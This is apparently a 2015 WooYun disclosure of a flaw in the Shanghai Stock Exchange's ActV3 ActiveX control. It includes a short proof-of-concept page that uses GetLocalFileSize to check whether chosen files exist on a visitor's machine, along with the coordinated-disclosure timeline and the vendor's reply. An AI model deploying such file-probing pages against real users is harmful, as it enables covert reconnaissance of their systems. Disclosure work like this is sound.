当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-099681

漏洞标题:上海证券交易所IE插件某漏洞可导致用户本地一些信息泄漏

相关厂商:上海证券交易所

漏洞作者: telnetgmike

提交时间:2015-03-05 16:41

修复时间:2015-04-20 14:22

公开时间:2015-04-20 14:22

漏洞类型:敏感信息泄露

危害等级:高

自评Rank:18

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-03-05: 细节已通知厂商并且等待厂商处理中
2015-03-10: 厂商已经确认,细节仅向厂商公开
2015-03-20: 细节向核心白帽子及相关领域专家公开
2015-03-30: 细节向普通白帽子公开
2015-04-09: 细节向实习白帽子公开
2015-04-20: 细节向公众公开

简要描述:

上海证券交易所IE插件导致用户信息泄漏

详细说明:

上海证券交易所IE插件导致用户信息泄漏
ActV3控件提供的API中,GetLocalFileSize API可以被用来获取浏览器用户的本地文件大小,当文件不存在时返回一个错误号。
攻击者可利用这个API来判断被攻击者硬盘目录中是否存在某一特定文件,将需对比的文件名放在数组中,则可实现目录遍历,为更深层次攻击提供情报支持,如确定系统或软件的某一特定文件是否存在来判断被攻击者使用了什么版本的软件和系统,然后可以执行有针对性攻击或漏洞挖掘,或者判断计算机中是否存在某一特定文档来确定该计算机是否是需要攻击的目标。

漏洞证明:

http://biz.sse.com.cn/sseportal/ps/zhs/ca/ca_activex_control_check.jsp
可在上面的页面中下载安装ActV3控件。

<html>
Test Exploit page
<object classid='clsid:3DE5C04B-916B-40FC-B976-60119CA5EB21' id='target' ></object>
<script language='javascript'>
document.write("<p/>GetLocalFileSize:can get all types file(file has no lock) size number.");
document.write("<p/>GetLocalFileSize");
var filenames = ["C:/WINDOWS/system32/calc.exe",
"C:/WINDOWS/system32/calc1.exe"];
for(var i=0;i<filenames.length;i++){
var filename = filenames[i];
var fsize = target.GetLocalFileSize(filename);
if(fsize>0)
	document.write("<br/>"+filename);
else
	document.write("<br/>"+filename+" err:"+fsize);
	}
</script>
</html>


将以上代码保存到远程服务器中,如actv3.html,然后在本地打开IE浏览该页面,例如下图显示calc.exe存在,而calc1.exe不存在

Screen Shot 2015-03-05 at 16.21.51.png

修复方案:

版权声明:转载请注明来源 telnetgmike@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:20

确认时间:2015-03-10 13:50

厂商回复:

CNVD确认并复现所述情况,已经转由CNCERT下发给上海分中心同时通报给证监会信息中心,由其后续协调涉事单位处置.同时,近期的4个相类似的漏洞一并处置。

最新状态:

暂无

漏洞评价:

评论

  1. 2015-03-06 08:23 | cncert国家互联网应急中心(乌云厂商)

    mark,看到了少见的控件远程代码执行.将会及时协调系统管理单位.